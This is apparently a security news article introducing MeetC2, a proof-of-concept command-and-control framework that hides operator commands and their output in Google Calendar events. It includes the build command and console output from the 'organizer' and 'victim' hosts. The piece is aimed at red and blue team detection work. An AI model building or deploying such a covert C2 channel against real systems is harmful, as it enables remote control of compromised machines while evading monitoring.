Background: Modern adversaries increasingly hide command-and-control (C2) traffic inside cloud services. We built this proof of concept (PoC) to study and demonstrate those techniques in a controlled way, emulating those tactics so red and blue teams can exercise detection, telemetry, and response to cloud abuse scenarios.
Storytime: During an internal purple-team exercise, we saw how easily traffic to trusted SaaS domains slipped. We built a lightweight, cross‑platform PoC that uses Google Calendar, giving teams a reproducible way to validate detections, logging, and third‑party app governance for cloud‑abuse C2 in a controlled environment.
MeetC2: MeetC2 is a proof-of-concept C2 framework that uses the Google Calendar API as a covert communication channel between operators and a compromised system.
MeetC2, a.k.a. MeetingC2, is a cross-platform (macOS/Linux) application that demonstrates how legitimate cloud services can be abused for adversarial operations. By using Google Calendar APIs, the framework creates a hidden communication channel that blends in with normal business traffic.
Domains utilised here are “oauth2.googleapis.com” & “www.googleapis.com“. Once authenticated, the agent enters a polling loop, sending GET requests every 30 seconds to “www.googleapis.com/calendar/v3/calendars/{calendarId}/events” to check for new calendar events containing commands.
When the organiser wants to issue a new command, they can POST a new event to the same Calendar API endpoint via “organiser” agent with the command embedded in the event’s summary field, like “Meeting from nobody: [COMMAND]”.
The “guest” agent identifies these command events during its regular polling, which extracts and executes the command locally, then updates the same event via a PUT request to include the command output within the [OUTPUT] [/OUTPUT] parameter in the description field.
Compile:
./build-all.sh <credentials.json> <calendar_id>
Attacker host:
bash-3.2$ ./organizer credentials.json [NAME]@group.calendar.google.com
MeetC2 Organizer
Commands:
exec <cmd> — Execute on all hosts
exec @host:<cmd> — Execute on specific host
exec @*:<cmd> — Execute on all hosts (explicit)
list — List recent commands
get <event_id> — Get command output
clear — Clear executed events
exit — Exit organizer
— — — — — — — — — — — — — — — — — — — —
> exec whoami
Command created for all hosts: qfj4tt8a4uoi8p7cd3b8t31337
>
>
Victim host:
bash-3.2$ ./guest-darwin-arm64
16:08:04 MeetC2 Guest started on dhirajmishra
16:08:04 Calendar ID: [NAME]@group.calendar.google.com
16:08:04 Polling every 10 seconds…
16:08:15 Executing command: whoami
16:08:16 Successfully updated event with output
Acknowledgements: This project was inspired by the GC2-sheet author LooCiprian. Hence, special thanks to him.
OpSec: While this is functional, I know there are improvements in OpSec specifically for the “guest” binary. Hence, please use a test GCP project for such a setup, which should be purged later.
https://github.com/deriv-security/MeetC2
About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, MeetC2)